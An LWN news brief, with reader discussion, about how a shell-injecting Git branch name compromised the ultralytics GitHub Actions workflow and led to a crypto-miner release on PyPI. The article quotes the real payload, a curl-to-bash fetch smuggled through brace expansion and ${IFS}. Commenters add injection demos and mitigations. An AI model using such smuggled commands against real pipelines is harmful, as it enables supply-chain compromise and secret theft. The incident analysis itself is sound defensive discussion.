
Abusing Git branch names to compromise a PyPI package

A compromised release was uploaded to PyPI after a project automatically processed a pull request using a flawed script. The GitHub account "OpenIM Robot" (which appears to be controlled by Xinwei Xiong) opened a pull request for the ultralytics Python package. The pull request included a suspicious Git branch name:

openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)

Unfortunately, ultralytics uses the pull_request_target GitHub Actions trigger to automate some of its continuous-integration tasks. This trigger runs a script from the base branch of the repository, which has access to the repository's secrets — but that script was vulnerable to a shell-injection attack via the branch name of the pull request. The injected script appears to have used the credentials it had access to in order to compromise a later release uploaded to PyPI, adding a cryptocurrency miner. It is hard to be sure of the details, because GitHub has already removed the malicious script.
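To make the branch name's tricks concrete, here is a minimal bash sketch, with a harmless echo standing in for the curl|bash payload and an eval standing in for the textual substitution that the workflow template performs before the shell runs (all names here are illustrative):

{echo,hello}                    # brace expansion: runs "echo hello" with no literal space
echo${IFS}world                 # ${IFS} expands to whitespace: runs "echo world"
# Command substitution fires as soon as the string is parsed as shell code;
# the template substitution in the vulnerable workflow has the same effect
# as this eval:
branch='$({echo,pwned}${IFS}|${IFS}cat)'
eval "echo checking out: $branch"    # prints "checking out: pwned"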

This problem has been known for several years, but this event may serve as a good reminder to be careful with automated access to important secrets.




Usernames

Posted Dec 6, 2024 19:04 UTC (Fri) by quotemstr (subscriber, #45331) [Link] (14 responses)

This experience should inform the discussion on user name sanitization at https://lwn.net/Articles/1000485/

I come down *hard* on the side of limiting identifiers to the smallest possible character set, especially in non-user-facing contexts. Programming identifiers should be printable ASCII characters with no whitespace. KISS.

Usernames

Posted Dec 6, 2024 19:58 UTC (Fri) by epa (subscriber, #39769) [Link]

And in an environment where you want to be extra paranoid, don’t just limit to ASCII printable but to “word characters” and perhaps limited punctuation like .-_

Even then you should be stricter with the first character, since strings beginning with - can still cause mischief in shell command lines or in some languages such as Tcl.
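A sketch of that rule as a shell check (the helper name and the exact character class are one possible reading of the policy, not a standard):

# first character must be a letter; the rest word characters plus ._-
valid_username() {
    [[ $1 =~ ^[A-Za-z][A-Za-z0-9._-]*$ ]]
}
valid_username 'alice-2'  && echo accepted   # accepted
valid_username '-rf'      || echo rejected   # leading '-' rejected
valid_username 'a$(id)'   || echo rejected   # shell metacharacters rejected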

Usernames

Posted Dec 7, 2024 1:52 UTC (Sat) by geofft (subscriber, #59789) [Link] (2 responses)

Unfortunately, that wouldn't have helped in this case: all the characters in this string were printable ASCII with no whitespace (hence ${IFS} to get a space).

I would agree it doesn't make sense to allow things like dollar signs in usernames. I do think there's merit in considering permitting alphanumeric characters from other alphabets (accented Latin letters, Arabic, Devanagari, Hiragana, etc.)—but not their punctuation or whitespace, either. (Of course even this proposal deserves some careful consideration.)

Usernames

Posted Dec 7, 2024 14:54 UTC (Sat) by quotemstr (subscriber, #45331) [Link] (1 responses)

Sure. I'd actually want to apply David Wheeler's entire sanitization program: https://dwheeler.com/essays/fixing-unix-linux-filenames.html

Banning literal terminal control codes in usernames would merely be a good start.

Usernames

Posted Dec 8, 2024 3:51 UTC (Sun) by geofft (subscriber, #59789) [Link]

Oh, yeah, the rules proposed on that web page, at the very bottom, sound along the lines of what I was thinking - they do permit accented or non-Latin letters (which aren't currently allowed for usernames) and mandate UTF-8 encoding for those, but they forbid punctuation that is meaningful to the shell.

Usernames

Posted Dec 7, 2024 15:26 UTC (Sat) by mathstuf (subscriber, #69389) [Link] (9 responses)

Maybe. I think the core issue is that PR pipelines had access to secrets to publish at all, not just "someone could do some crazy thing to make a workflow do something unexpected". I am not really sure how GHA secrets work, but GitLab is really simple in that I can lock secrets to:

- protected branches
- jobs with a specific "environment" tag attached to them

I think there is absolutely no reason that PR CI pipelines/workflows should have any access to *any* secrets regardless of whether they can be coaxed into doing unintended things or not.

Usernames

Posted Dec 7, 2024 16:39 UTC (Sat) by excors (subscriber, #95769) [Link] (8 responses)

> I think the core issue is that PR pipelines had access to secrets to publish at all

According to https://blog.yossarian.net/2024/12/06/zizmor-ultralytics-... (previously linked by nickodell), the exploited workflow didn't have permissions to publish directly, but the exploit probably used cache poisoning as a method of privilege escalation. (I think that workflow is just a bot that auto-formats and adds slightly patronising LLM-generated comments to pull requests.)

As detailed in https://adnanthekhan.com/2024/05/06/the-monsters-in-your-... , GitHub Actions has (optional) caching support for the inputs and outputs of workflows. The cache server uses branches as the security boundary: cache entries written by a workflow in a given branch can only be read by workflows in the same branch or a descendant (pull requests, forked projects, etc). In this case, the exploited workflow is configured as pull_request_target which is triggered by a pull request but executes in the project's main branch (unlike pull_request which executes in the pull request's branch, I think). That means it can write arbitrary data into the main branch's cache, and any other workflows running in the main branch with caching enabled will read from that poisoned cache.

That includes the workflow that signs and publishes artifacts to PyPI, which uses a pip cache for the standard dependencies of the publish scripts. The attacker can insert their own files into the pip cache, allowing arbitrary code execution in the publish workflow.
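Reduced to a bash sketch, the boundary violation looks like this (paths and names are hypothetical; the real exploit script was removed by GitHub):

CACHE_DIR=${CACHE_DIR:-/tmp/ci-cache}; mkdir -p "$CACHE_DIR"
# job A: attacker-controlled code, but scoped to the main branch's cache
# because of pull_request_target
echo 'attacker data' > "$CACHE_DIR/shared-artifact"
# job B: a trusted main-branch workflow (e.g. the publish job) restoring
# the same cache later
cat "$CACHE_DIR/shared-artifact"   # consumes attacker data as if trusted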

The cache poisoning article recommends "Never run untrusted code within the context of the main branch if any other workflows use GitHub Actions caching", and the zizmor article says pull_request_target is "a fundamentally dangerous workflow trigger". GitHub's documentation doesn't go that far, but does mention cache poisoning and other dangers with pull_request_target (https://docs.github.com/en/actions/writing-workflows/choo...).

It looks like Ultralytics violated multiple security best practices here - but on the other hand, it looks like GitHub has created a large number of footguns and made it very tricky to use GitHub Actions securely, so I'm not sure how much I can blame their users for getting it wrong.

Usernames

Posted Dec 7, 2024 21:05 UTC (Sat) by mathstuf (subscriber, #69389) [Link] (7 responses)

Thanks, I had missed that link. Yes, the cache-poisoning angle is interesting… probably more relevant to cloud-resident runners (we have our own fleet of runners for our GitLab instance for $VARIOUS_REASONS). I know we use fleet-wide caching for Linux compilations and host-wide compiler caching for macOS and Windows. I see a few projects using caches for `cargo`, but I *believe* that `cargo` will hash-verify before actually using anything from it. Is `pip` missing hash verification somewhere? Maybe we'd need the payload to know?

> (I think that workflow is just a bot that auto-formats and adds slightly patronising LLM-generated comments to pull requests.)

Ugh. "Fix formatting" commits are pretty much the epitome of useless commit noise. Useless diff, useless commit message. I've gone over that in comments here previously; I'll avoid rehashing it again.

> it looks like GitHub has created a large number of footguns and made it very tricky to use GitHub Actions securely, so I'm not sure how much I can blame their users for getting it wrong.

Yes…I've mostly done GitLab-CI, but every time I visit GHA I am rebuffed by its (to me) unnecessary complexity.

Cache poisoning in CI

Posted Dec 8, 2024 4:17 UTC (Sun) by geofft (subscriber, #59789) [Link] (1 responses)

cargo, I believe, caches source code globally (user-wide) and build artifacts per project, including build artifacts for dependencies. Source code has checksums that are attested by the registry, but build artifacts are likely going to change per environment, so I believe they do not get any hash checking. If you preserve ~/.cargo alone then cache poisoning is probably difficult (though I bet there are attacks based on poisoning things like ~/.cargo/config.toml that are strictly speaking not part of the cache). If you also cache the current working directory, which is a reasonable thing to want to do to speed up build times in a project with a bunch of third-party dependencies, then I believe cache poisoning is pretty easy.

pip, on the other hand, caches build artifacts globally (user-wide), in the sense that an upstream project that only provides source code gets built into binary form (a wheel) locally by itself, and then that wheel is installed into whichever environment you're running pip on. As with the cargo situation, there's nothing to chain hash verification to for a locally-built binary artifact. But because the binary artifacts are shared, cache poisoning is indeed easy.

I can't think of a way to solve either of these robustly - any place that you store the hash of the output is going to be as vulnerable as the output itself, no? I think the only thing you can do is to make the cache read-only when doing builds of attacker-controlled code, and only write to the cache on CI runs triggered post merge (or if the PR author is trusted). This appears to be less than straightforward with github.com/actions/cache, and I'm very much not sure if that really makes the cache read-only or if it only skips an intentional write, such that a sufficiently clever attacker-controlled script can talk to the cache API itself and do a write with the same credentials used to read the cache.
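A sketch of that policy, as a CI script might express it (the helpers and build step are hypothetical stand-ins; with github.com/actions/cache the analogous split is between its separate restore and save sub-actions):

restore_cache() { echo 'restoring cache'; }   # stand-in for the real cache action
save_cache()    { echo 'saving cache'; }      # stand-in for the real cache action

restore_cache                     # reading is fine even for untrusted code
./build.sh                        # possibly attacker-controlled build step (hypothetical)
if [ "$GITHUB_EVENT_NAME" = "push" ]; then
    save_cache                    # write back only from trusted post-merge runs
fi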

(Also, the pip ecosystem includes the option to get binaries from the registry, and it is standard practice to provide and to use these binaries - this makes sense because Python users are generally not expected to have a working C toolchain since they're writing an interpreted language, while Rust is itself a compiled language and needs at least a linker and the libc development library/headers from a C toolchain, so Python users benefit much more than Rust users from precompiled libraries. I don't know offhand if pip is good at verifying the hash of a wheel in the cache that is attested in the registry, or if it doesn't distinguish such wheels from locally-built wheels.)

Cache poisoning in CI

Posted Dec 8, 2024 7:35 UTC (Sun) by mathstuf (subscriber, #69389) [Link]

Even with the cache, we still update the index on every pipeline, so one would need to intercept that. I suppose one could put bad things into the cache with a dedicated MR, but I'm not sure how one would make `master` use it blindly as it is set up to still ask `crates.io`. I suppose it hinges on whether already-downloaded things are actually re-verified or not when using them. Something to test…

> If you also cache the current working directory, which is a reasonable thing to want to do to speed up build times in a project with a bunch of third-party dependencies, then I believe cache poisoning is pretty easy.

Yeah, that seems a lot easier to target. For compilation, we use `sccache`. Not only does this get us cache hits across crates, but it also means we're not limited to storing only "the last version built" in the cache.

Usernames

Posted Dec 8, 2024 10:25 UTC (Sun) by excors (subscriber, #95769) [Link] (4 responses)

> Is `pip` missing hash verification somewhere?

This is getting far beyond my ability to research it with even a little bit of confidence, so you definitely shouldn't trust what I'm saying. But I get the impression that the GitHub Actions pip cache works by caching ~/.cache/pip, which includes both downloaded files and locally-built wheels (to save the cost of rebuilding packages before installing). There's no way to verify the integrity of those wheels, so an attacker tampering with them will cause trouble.

(The download cache may not be very secure either: "By default, pip does not perform any checks to protect against remote tampering and involves running arbitrary code from distributions" (https://pip.pypa.io/en/stable/topics/secure-installs/). It checks the (optional) hashes provided by index servers as "a protection against download corruption", not for security. You can improve that by specifying hashes in the local requirements.txt, though I don't know if verification happens before or after the cache.)

Usernames

Posted Dec 8, 2024 14:02 UTC (Sun) by mathstuf (subscriber, #69389) [Link]

Hopefully clarifications (and any relevant improvements) can come from trailofbits and others working on the PyPI security story.

Usernames

Posted Dec 8, 2024 22:51 UTC (Sun) by meejah (subscriber, #162580) [Link]

pip can be told to verify the hashes of the wheels it downloads. This isn't necessarily "hard" per se, but it is an extra step, so many projects don't bother shipping such hash requirements.

That is, an end-user application can ship a "requirements.txt" file that contains hashes for all possible wheels for all exact versions of every requirement, and then pass `--require-hashes`. One problem is that it's "all possible wheels at some point in time" and authors may upload previously-non-existent wheels later.

I don't believe there's any way to declare your dependencies with hashes (e.g. a Python library or application can say "I depend on foo == 1.2.3" but cannot specify the hashes -- and yes, there are usually many because wheels are architecture / platform specific).
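For illustration, the hash-pinned form looks like this (the pin is real syntax, but the package name and digest below are placeholders, not real values):

# requirements.txt, one --hash per acceptable artifact:
#   foo==1.2.3 \
#     --hash=sha256:0000000000000000000000000000000000000000000000000000000000000000
pip install --require-hashes -r requirements.txt
# pip-tools can generate such a file from loose requirements:
pip-compile --generate-hashes requirements.in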

Usernames

Posted Dec 8, 2024 23:31 UTC (Sun) by randomguy3 (subscriber, #71063) [Link] (1 responses)

If pip is looking in the cache to satisfy a request for a wheel it would otherwise have downloaded, it will indeed verify that the hash of the local wheel matches the server-reported hash of the file it would have downloaded.

I've occasionally run into this when some badly-behaved project overwrote a wheel (on a company-internal server) and all the builds that had existing caches broke!

Usernames

Posted Dec 8, 2024 23:33 UTC (Sun) by randomguy3 (subscriber, #71063) [Link]

To be clear: the builds broke because in this situation, pip doesn't attempt to fix the cache, but instead errors out (which isn't an unreasonable action from a security standpoint).

How to fix the whole category of shell injection

Posted Dec 6, 2024 19:16 UTC (Fri) by raven667 (subscriber, #5198) [Link] (21 responses)

Relying on the interactive shell for automation in the presence of malicious input is the underlying problem: features useful for interactive use and personal scripts (globbing and splitting arguments, subshells, and various expansions) are dangerous across a security boundary, and they are a constant source of problems because it's _so_ easy to naively invoke a shell. I'm sure greater minds have tried tackling this problem and failed, but could we design a non-interactive mode for at least one common shell that optionally disables subshells and variable expansions, via a `set` command or CLI option, so that language runtimes (like PHP) and utilities (like git) could default to a more-secure shell subset that wouldn't be susceptible to this kind of shenanigans? Consider Shellshock, the recent Palo Alto issues, and now this, plus all the places I've seen people use $() / `` / system() instead of creating an ARGV, or just putting $var in a shell script without quoting, let alone using something fancier like "${var[@]}" or recognizing that $(( )) shell math can also run commands.

Maybe we could trace each code path that can result in fork() back to its origin and put a flag on each such source, so that someone can create an allow list of the kinds of invocations they are willing to permit in their automation. People will probably hate it as much as SELinux if they have to enable things when their existing scripts break, but we'd have to make a collective decision about what we value more: system integrity, or avoiding the work of actually enumerating everything that should be allowed.

Maybe this could be a pragma comment in the scripts, like how you can ignore warnings with shellcheck, so you can say "yes please interpret and expand the arguments in this command" when that _is_ what you want to do in a way that is visible in the script.

Whatever we do, allowing data across a security boundary into an interactive command interpreter is a bad and dangerous thing to do, and we should make it easier to _not_ do that, which seems to be an impossible bar right now.

How to fix the whole category of shell injection

Posted Dec 6, 2024 19:51 UTC (Fri) by excors (subscriber, #95769) [Link] (7 responses)

As far as I can tell, shell expansion is not relevant in this case:

GitHub Actions workflows are defined in YAML files, where you can use syntax like ${{github.ref}} in values. Those will be expanded by the action runner when it executes the workflow. (https://docs.github.com/en/actions/writing-workflows/choo...)

One of the values in the YAML file is a shell script to execute. If you use ${{github.ref}} in there, the attacker-provided branch name will be inserted before the script is passed to the shell. The attacker doesn't even need to use $(...) in the branch name, they can simply use "; to exit from the current shell command and start a new one, and the shell sees a totally normal sequence of basic commands. (See PoC in https://github.com/advisories/GHSA-7x29-qqmq-v6qc , which is a different but similar vulnerability in exactly the same project a few months ago.)

I think the specific vulnerability here is fixed in https://github.com/ultralytics/actions/commit/89c1f380073... by moving all the ${{...}} out of the shell script block and into the 'env' block where they can't do any harm (although actually the branch name was removed entirely; presumably they didn't need it at all).
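The difference between the two patterns, in shell terms: template substitution splices attacker data into program text before parsing, while an environment variable is expanded after parsing and stays data. A bash sketch (the YAML lines in the comments are paraphrased, not quoted from the workflow):

# vulnerable:  run: echo "Branch: ${{ github.head_ref }}"
# fixed:       env:
#                HEAD_REF: ${{ github.head_ref }}
#              run: echo "Branch: $HEAD_REF"
branch='$({echo,pwned}${IFS}|${IFS}cat)'
eval "echo Branch: $branch"    # substitution into code: the payload runs
HEAD_REF="$branch"
echo "Branch: $HEAD_REF"       # variable expansion: the payload stays inert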

GitHub warns about this problem at https://docs.github.com/en/actions/security-for-github-ac...

How to fix the whole category of shell injection

Posted Dec 6, 2024 20:37 UTC (Fri) by wahern (subscriber, #37304) [Link] (2 responses)

This highlights the real problem: mixed data and code. The emphasis on sanitization seems misguided. Sanitization has value in the sense of defense in depth, but it's the wrong way to think about things. Wherever data and code are intermixed, the proper fix is always to separate them, preferably before an exploit is ever identified. Too many people jump straight to the sanitization issue, but not only does it not address the root problem, it's often a much thornier problem to resolve. In this case, as in most, you don't have to decide what characters should be valid in a branch name to solve an issue like this. Moreover, if you don't fix the issue properly, you leave the door open: maybe you got the character filter wrong, or maybe the semantics of evaluation changed (or were misdiagnosed) so that the exploit doesn't rely on special characters.

How to fix the whole category of shell injection

Posted Dec 6, 2024 21:14 UTC (Fri) by jwarnica (subscriber, #27492) [Link]

The SQL world mostly figured this out decades ago (if not always used) with parameters, basically making injection attacks impossible.

How to fix the whole category of shell injection

Posted Dec 7, 2024 11:02 UTC (Sat) by epa (subscriber, #39769) [Link]

The attacker only has to be lucky once. You need to sanitize input because there will be a mistake somewhere in the separation of data and code. And you need to separate data and code because there will be missing sanitization somewhere. As you say, defence in depth: but that's the only possible approach in a system that might be exposed to a public network.

But even without any attacker, constraining inputs is still good practice, I feel. It saves you time debugging later when a stray space character gets into a value and (even though you were not mixing data and code) it no longer compares equal to the value without the leading space. Something like a git branch name (or a username) is not the place to allow the full flowering of human creativity with special characters. There are plenty of commit-message and comment fields for that.

How to fix the whole category of shell injection

Posted Dec 7, 2024 5:59 UTC (Sat) by raven667 (subscriber, #5198) [Link] (2 responses)

Yeah, I just read through those details, and that matters a bit in this case: if you are using another template system to programmatically create a shell script, that provides more avenues for code injection. In this specific case, wouldn't it make sense for GitHub to scan Actions YAML files, flag any `run:` sections which have `${{` variable expansions in them, and at least link to their warning document?

What if multiple commands on a single line using `;` were also a flagged feature, disabled by default or at least able to be disabled? I'm not smart enough to figure out a whole system on my own, but I keep thinking we should find something as effective as SQL bind variables are at stopping unexpected command interpretation, applied to shell scripting; maybe the wholesale separation of the shell implementation used for interactive CLIs from the one used for scripting and automation, to make the little bits of automation that are sprinkled _everywhere_ safer.
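A crude version of the scan suggested above fits in one line, though real `run:` blocks are usually multi-line (`run: |`), so a serious linter needs a YAML parser rather than this sketch:

# flag single-line run: entries that interpolate ${{ ... }} directly
grep -rnE 'run:.*\$\{\{' .github/workflows/ && echo 'review these lines'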

How to fix the whole category of shell injection

Posted Dec 7, 2024 10:02 UTC (Sat) by NYKevin (subscriber, #129325) [Link] (1 responses)

The proper solution is to stop trying to interact with shells programmatically. Everything you can do with a shell can also be done with your favorite non-shell programming language. There are only two "good" reasons to use a shell:

* Interactive use by a human.
* Scripting of things that would otherwise be done interactively by a human (as a timesaving measure for human sysadmins, not as something you programmatically invoke in production).

Everything else is an antipattern, where the shell has been co-opted to replace a missing feature in another program (often using the shell's -c flag).
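The -c antipattern versus passing a real argv, even staying within shell (a harmless sketch; checking out a nonexistent name merely fails):

branch='$(touch /tmp/pwned)'
bash -c "git checkout $branch"   # data re-parsed as code: the touch runs
git checkout "$branch"           # one argv element: an odd name, but only data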

How to fix the whole category of shell injection

Posted Dec 7, 2024 20:15 UTC (Sat) by raven667 (subscriber, #5198) [Link]

I think that is where my half-formed thought was going. In this specific case the commands could just be an array of YAML strings, and the CI could parse them into an argv before applying template variable replacement. That wouldn't work when you have some if/then logic, but a shell-like DSL with a very restricted feature set could make the transition easier. Or you could just build expression evaluation into the YAML along with your template engine, similar to how Ansible has Python/Jinja `when:` expressions; there is some customization/integration work to be sure, but they didn't have to invent a whole custom system, and experience with the library transfers between different tools in the same ecosystem.

I'm just frustrated at seeing this same kind of problem again

How to fix the whole category of shell injection

Posted Dec 7, 2024 10:57 UTC (Sat) by fishface60 (subscriber, #88700) [Link]

> moving all the ${{...}} out of the shell script block and into the 'env' block where they can't do any harm

I see this bug everywhere. These YAML templating engines should require a schema to define how interpolated values are escaped (e.g. the way Ninja shell-escapes everything in a command context), or else declare that that part of your data format doesn't support interpolation.

How to fix the whole category of shell injection

Posted Dec 6, 2024 20:16 UTC (Fri) by Wol (subscriber, #4433) [Link]

> Maybe this could be a pragma comment in the scripts, like how you can ignore warnings with shellcheck, so you can say "yes please interpret and expand the arguments in this command" when that _is_ what you want to do in a way that is visible in the script.

The Pr1mos shell (early 80s) had something exactly like this. I don't remember the details, but v18 had a Command Processor Language (CPL) with all sorts of globbing. That then became part of the shell proper with v19. And I do remember something about switches where you could tell the shell to glob or not glob, and stuff like that. It's too long ago, but I do miss that power - so much of the past has been lost ...

Cheers,
Wol

How to fix the whole category of shell injection

Posted Dec 6, 2024 21:10 UTC (Fri) by rweikusat2 (subscriber, #117920) [Link] (6 responses)

Hmm ... sorry, but if someone writes code which generates an executable script/program by interpolating unvalidated user input into a text template, then he deserves whatever befalls him because of this. The solution is not crippling the command interpreter which will be used to execute this suicide script, but (emphatically) "Don't do that!"

At best, one could argue that GitHub shouldn't even provide such a feature because it's basically impossible to use it safely.

How to fix the whole category of shell injection

Posted Dec 6, 2024 21:15 UTC (Fri) by pizza (subscriber, #46) [Link] (5 responses)

> At best, one could argue that GitHub shouldn't even provide such a feature because it's basically impossible to use it safely.

But... it has an OpenSSF best practices badge, therefore it's safe and secure!

How to fix the whole category of shell injection

Posted Dec 6, 2024 21:47 UTC (Fri) by david.a.wheeler (subscriber, #72896) [Link] (4 responses)

> But... it has an OpenSSF best practices badge, therefore it's safe and secure!

I know you're being sarcastic, but I thought I should respond.

I'm technical lead of the OpenSSF Best Practices badge work. We know better than to claim *that*! If you look at the front page <https://www.bestpractices.dev> it says:

>> Consumers of the badge can quickly assess which FLOSS projects are following best practices and as a result are more likely to produce higher-quality secure software.

Unless you're making formal proofs of the code, "more likely" is all any list of criteria can hope to do. Thinking is *still* required. Thinking will be required next year, too :-).

Bash Replacement - Rust Scripts

Posted Dec 7, 2024 10:03 UTC (Sat) by ma4ris8 (subscriber, #170509) [Link] (3 responses)

Currently Bash is widely supported in editors, but making non-trivial secure Bash scripts is difficult. Are Rust scripts promoted as an alternative?

Bash Replacement - Rust Scripts

Posted Dec 7, 2024 15:36 UTC (Sat) by smcv (subscriber, #53363) [Link]

If you can inject arbitrary code into a template that is subsequently run as a script (as in this particular vulnerability), it doesn't really matter whether it's arbitrary shell execution, arbitrary Rust execution, or any other language like Python or Lua - arbitrary code is arbitrary code.

Shell script makes it very hard to avoid *other* vulnerabilities, but *this* vulnerability wasn't a shell problem.

Bash Replacement - Rust Scripts

Posted Dec 7, 2024 23:21 UTC (Sat) by jengelh (guest, #33263) [Link] (1 responses)

There are many languages which have had ambitions to replace shell scripts as a "safer" alternative. But every now and then there are features of sh that, when written in the new language, amount to more code than before.

while read x y z; do foo "$x" | bar "$y" | baz "$z"; done <file

Now do that in Perl, Python, Lua, anything (or Rust if you insist). Whenever you need more than three lines, sh syntax "wins", as users like the terseness.

Bash Replacement - Rust Scripts

Posted Dec 9, 2024 10:44 UTC (Mon) by taladar (subscriber, #68407) [Link]

Terseness has advantages in interactive use, but in scripts it really isn't necessary, especially if you are just talking about the same number of tokens spread over more lines.

How to fix the whole category of shell injection

Posted Dec 6, 2024 23:34 UTC (Fri) by ballombe (subscriber, #9523) [Link] (3 responses)

Much-maligned Perl has a taint mode that requires input to be validated before being used.

How to fix the whole category of shell injection

Posted Dec 7, 2024 6:08 UTC (Sat) by raven667 (subscriber, #5198) [Link] (2 responses)

I *love* that about Perl and wonder why this kind of pervasive variable validation/tracking isn't present in more languages. It's so darn useful. Maybe `my ($number) = $cgi->param('number') =~ m/^(\d+)$/;` isn't the prettiest thing, but it's effective.

How to fix the whole category of shell injection

Posted Dec 9, 2024 10:46 UTC (Mon) by taladar (subscriber, #68407) [Link] (1 responses)

As far as I recall, Ruby originally had that too; I'm not sure if it is still around.

The main problem I see with a general taint flag on input is that tainted data is really not well defined. Data could be e.g. perfectly fine for use in a shell script but cause an injection in SQL or HTML.

How to fix the whole category of shell injection

Posted Dec 9, 2024 11:15 UTC (Mon) by farnz (subscriber, #17727) [Link]

Taint is well-defined, and doesn't mean "unsafe to use"; it means that the data came from an untrusted source, and has not yet been either validated for safety, or parsed into a trusted format.

The idea is that you have a "taint removal" layer that carefully handles potentially dangerous data, and converts it to a safe form or an error; most of your code doesn't go near the dangerous data, and the code that does can be carefully audited for correctness. Then, any injection bugs must either be in the "taint removal" layer, or in the layer that turns "safe" internal data into external data.

And note that this is a natural pattern in languages with strict type systems; you have parsers that take input and turn it into internal structures, then you do your work on the internal structures, and you convert again from internal to external structures as you interact with other programs.

How to fix the whole category of shell injection

Posted Dec 7, 2024 16:35 UTC (Sat) by eru (subscriber, #2753) [Link]

Perl has this concept of tainted data, which perhaps would help.

LWN "also impacted"

Posted Dec 6, 2024 20:32 UTC (Fri) by Bigos (subscriber, #96807) [Link] (2 responses)

This message has also "compromised" LWN, as the branch name is so long that it makes the right pane take 80% of the space, leaving the left pane with articles very narrow.

Maybe break the branch name so that it is over several lines?

LWN "also impacted"

Posted Dec 6, 2024 20:45 UTC (Fri) by daroc (editor, #160859) [Link] (1 responses)

D'Oh! This is what I get for using the one-column view as the default. Just a minute.

LWN "also impacted"

Posted Dec 6, 2024 21:03 UTC (Fri) by daroc (editor, #160859) [Link]

The front page should be fixed — although I took the lazy way out and added optional line breaks instead of actually getting the CSS correct.

Linting GitHub workflows for escalation-of-privilege vulnerabilities

Posted Dec 6, 2024 22:16 UTC (Fri) by nickodell (subscriber, #125165) [Link]

William Woodruff has been working on a tool, zizmor, which analyzes GitHub workflow files and looks for insecure design choices. He claims that it would have found the ultralytics issue. I have not tried it personally, but it seems like an interesting idea.

https://blog.yossarian.net/2024/12/06/zizmor-ultralytics-...

"Some surprising code execution sources in bash"

Posted Dec 7, 2024 10:41 UTC (Sat) by rudis (subscriber, #130572) [Link]

This is a good time to mention https://yossarian.net/til/post/some-surprising-code-execu... which mentions further problems with bash (and possibly other shells) even when no direct injection is happening.

Additional malware versions released

Posted Dec 7, 2024 20:26 UTC (Sat) by ewen (subscriber, #4772) [Link]

It appears two further malware-infected package versions were released in the last 24 hours:

https://github.com/ultralytics/ultralytics/issues/18027#i...

And the current theory is that those were uploaded directly to PyPI, presumably using stolen credentials (e.g. a PAT — personal access token), since there doesn't seem to be a matching GitHub CI run.

See also the summary from the repo owner:

https://github.com/ultralytics/ultralytics/pull/18018#iss...

But also note that some of the details are disputed by one of the security researchers who looked into it in detail yesterday (and did a large write-up, linked by others earlier):

https://github.com/ultralytics/ultralytics/issues/18027#i...

So it appears there'll need to be more cleanup from the attacker having gotten in via string-interpolation issues :-/ Meanwhile, a bunch of packages depending on the impacted package have locked the version to the last release before the malware-infected versions and/or suggested their users check for and remove the affected versions.

I guess we should be glad it’s “just” a crypto miner this time (which is fairly noisy / obvious due to the CPU usage).

Ewen

Microsoft had a good idea

Posted Dec 8, 2024 12:48 UTC (Sun) by cbcbcb (subscriber, #10350) [Link] (16 responses)

Microsoft had a good idea when they invented the "C:\Documents and Settings" directory. It meant that all Windows software routinely encountered filenames with spaces, and it had to be fixed.

It would be rather inconvenient to rename "/home" as "/home$(touch /tmp/security_bug)", but I bet you'd still find a lot of broken filename handling if you did.

Microsoft had a good idea

Posted Dec 8, 2024 13:14 UTC (Sun) by mb (subscriber, #50428) [Link] (1 responses)

I get the idea and I generally agree. But file names can't have / or NUL in them. :)

Microsoft had a good idea

Posted Dec 8, 2024 13:33 UTC (Sun) by cbcbcb (subscriber, #10350) [Link]

You can... you just need a couple of nested directories to do it :)

Microsoft had a good idea

Posted Dec 8, 2024 19:52 UTC (Sun) by eru (subscriber, #2753) [Link]

Windows has its own super-weird filename restrictions. You cannot use a device name as a pathname component, and this even includes names with a dot and a suffix. This sometimes trips you up when copying files from other operating systems, where something like "aux.c" is a perfectly reasonable name.

Microsoft had a good idea

Posted Dec 9, 2024 6:09 UTC (Mon) by lkundrak (subscriber, #43452) [Link] (8 responses)

I think they renamed it to "C:\Users" in more recent versions, and "Documents and Settings" is merely a symlink/junction (or the other way around?). Wondering why.

Microsoft had a good idea

Posted Dec 9, 2024 8:00 UTC (Mon) by Cyberax (✭ supporter ✭, #52523) [Link] (4 responses)

WSL (10 characters)

Microsoft had a good idea

Posted Dec 9, 2024 9:06 UTC (Mon) by zdzichu (subscriber, #17118) [Link] (2 responses)

Could you expand a little? WSL is either a Linux API implementation (WSL 1) or Linux itself (WSL 2); neither has a problem with longer filenames with spaces.

Microsoft had a good idea

Posted Dec 9, 2024 18:33 UTC (Mon) by Cyberax (✭ supporter ✭, #52523) [Link] (1 responses)

> neither have a problem with longer filenames with spaces.

Try setting your $HOME to a path with spaces, and watch the errors roll in as all kinds of scripts start breaking. GUI utilities typically work fine, but anything involving shell scripts just cracks.
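The classic failure mode is an unquoted expansion, as in this contrived sketch:

dir='/tmp/My Home'                # a HOME-like path containing a space
mkdir -p "$dir" && touch "$dir/file"
cp $dir/file /tmp/                # unquoted: cp sees '/tmp/My' and 'Home/file' and fails
cp "$dir/file" /tmp/              # quoted: one argument, works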

Microsoft had a good idea

Posted Dec 11, 2024 16:59 UTC (Wed) by jezuch (subscriber, #52988) [Link]

So.... Windows fixed this and then they pulled the Unix stuff and had to accommodate all the broken stuff in it?

Oh the irony!

Microsoft had a good idea

Posted Dec 9, 2024 10:26 UTC (Mon) by leromarinvit (subscriber, #56850) [Link]

Can't be the reason. They renamed it in Vista IIRC (certainly no later than Windows 7), long before WSL.

Microsoft had a good idea

Posted Dec 9, 2024 10:24 UTC (Mon) by excors (subscriber, #95769) [Link] (2 responses)

It changed in Vista, at a time when many APIs were limited to a MAX_PATH of 260 characters. I can't find any official explanations, but there are plausible claims that the renaming from "C:\Documents and Settings\foo\Application Data\..." to "C:\Users\foo\AppData\..." was specifically to shorten paths and allow applications to have more deeply nested folder structures.

Microsoft had a good idea

Posted Dec 9, 2024 16:54 UTC (Mon) by raven667 (subscriber, #5198) [Link] (1 responses)

This is the likely technical reason, but it's also nice to bring the structure into alignment with Mac OS X and use a friendly, capitalized name, making one small detail platform-agnostic: user-managed files live under `/Users/$username/Documents` everywhere. Now I'm wondering if any of the desktop-oriented Linux distros considered making this change, with a compat symlink for /home.

Microsoft had a good idea

Posted Dec 12, 2024 9:47 UTC (Thu) by mgedmin (subscriber, #34497) [Link]

> Now I'm wondering if any of the desktop oriented Linux distros considered making this change, with a compat symlink for /home.

GoboLinux, which I've never tried personally. I don't think it has any compatibility symlinks, just a directory tree with /Programs, /Users, etc.

Microsoft had a good idea

Posted Dec 9, 2024 21:47 UTC (Mon) by bearstech (subscriber, #160755) [Link] (3 responses)

I once used "&" in a folder name. It broke so many things, it was scary; I gave up on the name.

Microsoft had a good idea

Posted Dec 10, 2024 8:12 UTC (Tue) by Wol (subscriber, #4433) [Link] (2 responses)

